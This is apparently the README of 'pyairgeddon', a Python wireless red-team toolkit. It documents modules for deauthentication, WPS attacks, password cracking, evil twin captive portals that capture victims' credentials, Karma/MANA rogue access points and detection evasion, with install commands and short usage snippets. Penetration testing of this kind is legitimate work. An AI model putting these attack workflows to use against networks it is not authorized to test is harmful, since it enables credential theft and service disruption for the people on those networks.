Python Wireless Security Auditing Tool for Professional Red Team Operations
A comprehensive toolkit for WiFi reconnaissance, rogue AP attacks, and stealth operations
██████╗ ██╗ ██╗ █████╗ ██╗██████╗ ██████╗ ███████╗██████╗ ██████╗ ██████╗ ███╗ ██╗
██╔══██╗╚██╗ ██╔╝██╔══██╗██║██╔══██╗██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔═══██╗████╗ ██║
██████╔╝ ╚████╔╝ ███████║██║██████╔╝██║ ███╗█████╗ ██║ ██║██║ ██║██║ ██║██╔██╗ ██║
██╔═══╝ ╚██╔╝ ██╔══██║██║██╔══██╗██║ ██║██╔══╝ ██║ ██║██║ ██║██║ ██║██║╚██╗██║
██║ ██║ ██║ ██║██║██║ ██║╚██████╔╝███████╗██████╔╝██████╔╝╚██████╔╝██║ ╚████║
╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝
RED TEAM EDITION v2.0
This tool is for AUTHORIZED SECURITY TESTING and EDUCATIONAL purposes ONLY.
- ✅ Only use on networks you own or have explicit written permission to test
- ✅ Follow responsible disclosure practices
- ❌ Unauthorized access to computer networks is ILLEGAL
- ❌ The developers assume NO LIABILITY for misuse
|
|
|
- OS: Linux (Kali recommended)
- Python: 3.8+
- Hardware: Wireless adapter with monitor mode + packet injection
# Clone repository
git clone https://github.com/yourusername/pyairgeddon.git
cd pyairgeddon
# Install Python dependencies
pip install -r requirements.txt
# Install system tools (Kali/Debian/Ubuntu)
sudo apt install aircrack-ng hostapd dnsmasq hcxtools hashcat reaver bully mdk4 macchanger
# Run
sudo python pyairgeddon.pysudo apt install aircrack-ng hostapd dnsmasq hcxtools hashcat mdk4 macchanger && pip install -r requirements.txt && sudo python pyairgeddon.pypyairgeddon/
├── pyairgeddon.py # Main GUI application
├── pyairgeddon_core.py # Interface management & scanning
├── pyairgeddon_attacks.py # Deauth, DoS, WPS attacks
├── pyairgeddon_cracker.py # Password cracking
├── pyairgeddon_eviltwin.py # Rogue AP & captive portal
├── pyairgeddon_recon.py # 🆕 Reconnaissance module
├── pyairgeddon_karma.py # 🆕 Karma/MANA attacks
├── pyairgeddon_evasion.py # 🆕 Stealth & evasion
├── install_tools.py # Tool installer
├── requirements.txt # Python dependencies
└── README.md
from pyairgeddon_recon import ReconCoordinator
recon = ReconCoordinator('wlan0mon')
recon.start_full_recon()
# Get results
networks = recon.beacon_analyzer.get_beacons()
security_issues = recon.beacon_analyzer.get_security_issues()
clients = recon.probe_tracker.get_clients()Classes: BeaconAnalyzer, ProbeTracker, HiddenNetworkDetector, ClientFingerprinter, VendorLookup
from pyairgeddon_karma import KarmaAttack, MANAAttack
# Basic Karma
karma = KarmaAttack('wlan0mon')
karma.start(channel=6)
# Full MANA with rogue AP
mana = MANAAttack('wlan0')
mana.start(ssid="FreeWifi", loud_mode=True)Classes: KarmaAttack, MANAAttack, LoudMANA, PNLCollector
from pyairgeddon_evasion import EvasionCoordinator, StealthScanner
# Setup stealth mode
evasion = EvasionCoordinator('wlan0')
evasion.setup_stealth_mode(level=2) # MAC + Low power
# Stealth scan
scanner = StealthScanner('wlan0mon')
result = scanner.start_passive_scan(duration=60, stealth_level=3)Classes: MACRandomizer, PowerController, TimingController, WIDSDetector, StealthScanner
| Tool | Purpose | Install |
|---|---|---|
| aircrack-ng | Wireless suite | apt install aircrack-ng |
| hostapd | Access point | apt install hostapd |
| dnsmasq | DHCP/DNS | apt install dnsmasq |
| hashcat | GPU cracking | apt install hashcat |
| mdk4 | DoS attacks | apt install mdk4 |
| macchanger | MAC spoofing | apt install macchanger |
# Check tool status
python install_tools.py --check
# Install missing
sudo python install_tools.py --allfrom pyairgeddon_evasion import StealthScanner
scanner = StealthScanner('wlan0mon')
result = scanner.start_passive_scan(duration=60, stealth_level=3)
for net in result.networks:
print(f"{net['ssid']} - {net['encryption']} - {net['signal']}dBm")from pyairgeddon_karma import PNLCollector
collector = PNLCollector('wlan0mon')
collector.start_collection()
# Wait...
collector.stop_collection()
collector.export_data('pnl_data.json')from pyairgeddon_eviltwin import EvilTwinAP
ap = EvilTwinAP('wlan0')
ap.start(ssid="TargetNetwork", channel=6, template='generic')
# Victims connect, credentials captured
creds = ap.get_credentials()
ap.stop()Contributions welcome! Please submit PRs for:
- Bug fixes
- New attack modules
- Captive portal templates
- Documentation
MIT License - See LICENSE
- Airgeddon - Inspiration
- hostapd-mana - MANA concepts
- aircrack-ng - Wireless suite
- Scapy - Packet manipulation
Made with ❤️ for the Security Community
⭐ Star this repo if you find it useful!